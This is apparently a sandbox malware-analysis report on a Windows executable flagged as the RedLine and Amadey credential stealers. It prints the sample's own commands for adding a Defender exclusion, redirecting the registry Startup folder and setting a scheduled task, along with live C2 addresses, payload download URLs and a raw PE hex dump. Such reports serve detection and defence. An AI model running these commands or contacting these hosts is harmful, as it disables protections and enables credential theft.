Play interactive tour

Edit tour

Windows Analysis Report mosoxxxHack.exe

Overview

General Information

Sample Name:	mosoxxxHack.exe
Analysis ID:	468922
MD5:	83d48ceb05204219598796cf99ade13c
SHA1:	4a0c8c188217da15ec37859e09f9ac8ad483faff
SHA256:	c8c685962497719668e4755f90ec88274dc6091379b6c6c8bebff3ad3c089672
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Amadey RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect sandboxes and other dynamic analysis tools (window names)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Adds a directory exclusion to Windows Defender

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Hides threads from debuggers

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Sigma detected: Powershell Defender Exclusion

.NET source code contains method to dynamically call methods (often used by packers)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Uses reg.exe to modify the Windows registry

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Sigma detected: Direct Autorun Keys Modification

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Contains capabilities to detect virtual machines

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

mosoxxxHack.exe (PID: 3008 cmdline: 'C:\Users\user\Desktop\mosoxxxHack.exe' MD5: 83D48CEB05204219598796CF99ADE13C)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

a.exe (PID: 6552 cmdline: 'C:\Users\user\AppData\Local\Temp\a.exe' MD5: E18585565F915216436E7939027E2E04)

powershell.exe (PID: 5712 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

a.exe (PID: 5704 cmdline: C:\Users\user\AppData\Local\Temp\a.exe MD5: E18585565F915216436E7939027E2E04)

drbux.exe (PID: 1380 cmdline: 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' MD5: E18585565F915216436E7939027E2E04)

powershell.exe (PID: 4832 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

drbux.exe (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe MD5: E18585565F915216436E7939027E2E04)

cmd.exe (PID: 6448 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6836 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\ MD5: CEE2A7E57DF2A159A065A34913A055C2)

schtasks.exe (PID: 6784 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN drbux.exe /TR 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6576 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ca82a716069a53\cred.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

clp.exe (PID: 7060 cmdline: 'C:\Users\user\AppData\Local\Temp\clp.exe' MD5: C72011B5EB1E01CE1C5B901895F78141)

drbux.exe (PID: 6972 cmdline: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe MD5: E18585565F915216436E7939027E2E04)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\ca82a716069a53\cred.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.244119121.0000000000CB3000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.406356590.0000000002B06000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.361979737.0000000002E00000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.365676474.0000000004115000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.362118888.0000000002F40000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: mosoxxxHack.exe PID: 3008	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: mosoxxxHack.exe PID: 3008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: a.exe PID: 6552	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: drbux.exe PID: 1380	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.mosoxxxHack.exe.2e40f6e.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.27e0ee8.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.27e0ee8.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.2f40000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.27e0000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.mosoxxxHack.exe.cb30d8.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.mosoxxxHack.exe.cb30d8.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.2e40086.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.2e40086.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.2f40000.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.27e0000.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.mosoxxxHack.exe.2e40f6e.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\a.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\a.exe, ParentProcessId: 6552, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', ProcessId: 5712

Sigma detected: Powershell Defender Exclusion

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\a.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\a.exe, ParentProcessId: 6552, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', ProcessId: 5712

Sigma detected: Direct Autorun Keys Modification

Show sources

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\, CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6448, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\, ProcessId: 6836

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\a.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\a.exe, ParentProcessId: 6552, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe', ProcessId: 5712

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\ProgramData\ca82a716069a53\cred.dll	Avira: detection malicious, Label: HEUR/AGEN.1137247
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	Avira: detection malicious, Label: HEUR/AGEN.1137247

Multi AV Scanner detection for submitted file

Show sources

Source: mosoxxxHack.exe

ReversingLabs: Detection: 43%

Antivirus / Scanner detection for submitted sample

Show sources

Source: mosoxxxHack.exe

Avira: detected

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\ca82a716069a53\cred.dll	Metadefender: Detection: 60%	Perma Link
Source: C:\ProgramData\ca82a716069a53\cred.dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe	Metadefender: Detection: 26%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	Metadefender: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\a.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\clp.exe	Metadefender: Detection: 26%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\clp.exe	ReversingLabs: Detection: 78%

Machine Learning detection for sample

Show sources

Source: mosoxxxHack.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\a.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\clp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe	Joe Sandbox ML: detected

Source: mosoxxxHack.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49723 version: TLS 1.2

Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: a.exe, drbux.exe, 0000001A.00000002.476412078.00000000041F1000.00000004.00000001.sdmp
Source:	Binary string: _.pdb source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_0041B5A4 FindFirstFileExW,

25_2_0041B5A4

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EDDC68
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	17_2_04FD9E9C
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	26_2_02FDDC68
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	26_2_05729E9C
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	26_2_0572D8A9

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49720 -> 109.234.32.63:80

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49714

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 91.142.79.35:13400Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 91.142.79.35:13400Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 91.142.79.35:13400Content-Length: 1124440Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 91.142.79.35:13400Content-Length: 1408Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: 91.142.79.35:13400Content-Length: 1434Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: x-vpn.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 33 31 26 73 64 3d 33 30 30 38 37 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 31 30 36 34 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.31&sd=30087f&os=1&bi=1&ar=1&pc=910646&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /hfV3vDtt/plugins/cred.dll HTTP/1.1Host: x-vpn.ug
Source: global traffic	HTTP traffic detected: GET /attachments/710557342755848243/876828681815871488/clp.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /hfV3vDtt/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428Host: x-vpn.ugContent-Length: 94843Cache-Control: no-cache

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 20 Aug 2021 15:10:46 GMTContent-Type: application/octet-streamContent-Length: 127488Connection: keep-aliveKeep-Alive: timeout=5Last-Modified: Mon, 19 Jul 2021 17:18:46 GMTETag: "1403ad6-1f200-5c77d213c6980"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 96 01 00 00 58 00 00 00 00 00 00 88 a4 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 40 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 94 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 a0 94 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 dd 09 00 00 00 d0 01 00 00 00 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 40 00 00 00 00 f0 01 00 00 02 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 94 1d 00 00 00 00 02 00 00 1e 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

TCP traffic: 192.168.2.3:49706 -> 91.142.79.35:13400

Source: mosoxxxHack.exe, 00000001.00000002.365082408.000000000353E000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.79.35:
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.79.35:13400
